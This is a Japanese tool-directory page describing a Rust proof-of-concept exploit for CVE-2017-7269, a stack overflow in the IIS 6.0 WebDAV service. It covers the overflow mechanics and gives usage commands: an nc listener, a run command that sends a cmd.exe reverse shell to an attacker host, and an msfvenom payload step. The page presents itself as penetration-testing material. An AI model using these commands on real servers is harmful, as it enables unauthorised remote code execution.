Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2017-7269 — CVE-2017-7269のPoCをRustで実装したもので、Microsoft Internet Information Services (IIS) 6.0のWebDAVサービスを対象としています。 | Kitploit
ツール/GitHubGitHub/nika0x38/cve-2017-7269
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubnika0x38/cve-2017-7269

CVE-2017-7269

CVE-2017-7269のPoCをRustで実装したもので、Microsoft Internet Information Services (IIS) 6.0のWebDAVサービスを対象としています。

リポジトリを見る
1211ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2017-7269 - IIS 6.0 WebDAV バッファオーバーフロー

RustSecurity

CVE-2017-7269のPOCのRust実装で、Microsoft Internet Information Services (IIS) 6.0のWebDAVサービスを標的としています。

脆弱性の概要

CVE-2017-7269は、Windows Server 2003 R2に同梱されたMicrosoft IIS 6.0のWebDAVサービスで発見された、深刻なスタックベースのバッファオーバーフローの脆弱性です。この脆弱性を悪用すると、認証されていない攻撃者がターゲットサーバー上でリモートコード実行を達成できる可能性があります。

技術的詳細

  • 脆弱性コンポーネント: httpext.dll (IIS WebDAV 拡張機能)
  • 脆弱性関数: ScStoragePathFromUrl
  • トリガー: 特別に細工された PROPFIND HTTP リクエスト。
  • 攻撃ベクトル: 複数のURLを含む過度に長い If: ヘッダー。

説明

この脆弱性は、古典的なスタックバッファオーバーフローです。ScStoragePathFromUrl 関数が悪意のある If: ヘッダーを含む PROPFIND リクエストを処理するときにトリガーされます。

このエクスプロイトは、スタック上に割り当てられたバッファをオーバーフローさせる長いバイト列を含むヘッダーを作成します。このオーバーフローにより、保存された戻りアドレス (EIP) を含む重要なスタックデータが上書きされます。エクスプロイトは、この戻りアドレスを悪意のあるヘッダー内にも存在する小さな初期シェルコードペイロードを指すように設定することで、プログラムの実行フローを乗っ取ります。この第一段階のシェルコードの役割は、同じHTTPリクエストの本文で送信されるメインペイロード (リバースシェル) を見つけて実行することです。このPOCは、cmd.exe シェルを攻撃者制御のリスナーに接続することで、リモートコード実行を実証します。

使用方法

例1: 組み込みリバースシェル

  1. リスナーを準備する (ポートを --lport に合わせて調整):

    root@kitploit:~
    nc -lvnp <attacker-port>
    
  2. 埋め込みシェルコードを使用してエクスプロイトを実行する:

    root@kitploit:~
    cargo run --release -- --rhost <target-ip> --rport <target-port> --lhost <attacker-ip> --lport <attacker-port>
    

    このツールは、LHOST/LPORT を使用してWSAシェルコードを即座にパッチし、HTTP本文で配信します。ターゲットが脆弱な場合、リスナーは cmd.exe からのリバースシェルを受信します。

例2: 外部ペイロード (推奨されません) (--payload)

  1. 生のペイロードを作成する

    root@kitploit:~
    msfvenom -p windows/exec CMD=whoami -f raw -o payload.bin
    
  2. ペイロードを配信する (シェルコードは既にその情報をエンコードしているため、--lhost/--lport は不要):

    root@kitploit:~
    cargo run --release -- --rhost <target-ip> --rport <target-port> --payload payload.bin
    
  3. コールバックを処理する (以前と同じリスナーで)。バイナリは提供されたバイトを単にストリームするため、正確な動作は生成したペイロードに依存します。

免責事項

このツールは、教育および許可されたペネトレーションテストの目的にのみ使用されます。責任を持って、自分が所有するシステムまたは明示的な許可を得たシステムでのみ使用してください。

ツールをダウンロード